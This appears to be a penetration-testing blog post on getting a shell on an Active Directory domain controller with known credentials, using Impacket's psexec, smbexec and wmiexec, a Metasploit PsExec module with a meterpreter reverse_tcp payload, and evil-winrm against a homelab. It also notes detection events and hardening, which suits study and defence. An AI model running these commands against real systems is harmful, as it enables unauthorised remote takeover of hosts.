gaining shell access
posted on 13 Jul 2022 under category Active-Directory in series Active_Directory
This is done once you have obtained valid credentials (a username and password).
# Impacket remote-execution scripts. All three authenticate to the target over
# SMB/RPC with the supplied account, which needs local administrator rights there.
# In the usage lines the first field is the AD domain name (Homelab.local in the
# examples), not the host name of the domain controller.
# NOTE: a password typed on the command line is kept in shell history and shows in
# the local process list; Impacket prompts for it when ":Password" is left out.
#
# Usage: psexec.py DOMAIN/Username:Password@DC-IP
# psexec.py copies a service binary to a writable share (normally ADMIN$) and
# registers it as a Windows service, which yields a SYSTEM shell.
# Detection: System event 7045 / Security event 4697 (new service installed) and
# an unexpected executable written to ADMIN$.
psexec.py Homelab.local/superman:'Password123!'@192.168.1.2
# Usage: smbexec.py DOMAIN/Username:Password@DC-IP
# smbexec.py uploads no binary; each command is run through a short-lived service
# whose command line invokes cmd.exe, so it typically produces one 7045 event per
# command.
smbexec.py Homelab.local/superman:'Password123!'@192.168.1.2
# Usage: wmiexec.py DOMAIN/Username:Password@DC-IP
# wmiexec.py runs commands through WMI over DCOM (TCP 135 plus a dynamic RPC port)
# as the authenticating user rather than SYSTEM; no service is created.
# Detection: WmiPrvSE.exe spawning cmd.exe, together with a network logon
# (Security event 4624, logon type 3) from an unusual source host.
wmiexec.py Homelab.local/superman:'Password123!'@192.168.1.2
# Metasploit console commands for the SMB PsExec module. The text after each '#'
# names the value to supply in its place.
# This is the same service-based technique as psexec.py, so the same telemetry
# applies on the target: System event 7045 and a network logon (Security 4624,
# logon type 3).
# Hardening that blunts all of the SMB/RPC methods on this page: unique local
# administrator passwords per host, no domain-admin logons to ordinary hosts, and
# host firewall rules that block inbound SMB/RPC except from management systems.
use exploit/windows/smb/psexec
set rhost #dc-ip
set smbdomain # domain name (Homelab.local in the examples above)
set smbpass # user's password
set smbuser # username
set Lhost # local-ip
# reverse_tcp makes the target connect back to Lhost, so outbound filtering on
# servers and alerting on unexpected egress from a domain controller both apply.
set payload /windows/x64/meterpreter/reverse_tcp # payload
run # run exploit
# Usage: ruby evil-winrm.rb -i DC-IP -u Username -p Password
# Opens a PowerShell session over WinRM (TCP 5985, or 5986 for HTTPS). The account
# must be permitted to use PowerShell remoting on the target (by default, members
# of Administrators or Remote Management Users).
# NOTE: as with the Impacket examples, -p on the command line leaves the password
# in shell history and the local process list.
# Detection: wsmprovhost.exe starting on the target, entries in the
# Microsoft-Windows-WinRM/Operational log, and PowerShell script block logging
# (event 4104) for what is run inside the session.
ruby evil-winrm.rb -i 192.168.1.2 -u superman -p 'Password123!'
# The list that follows appears to be the built-in commands that Evil-WinRM prints
# for `menu` once the session is open.
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit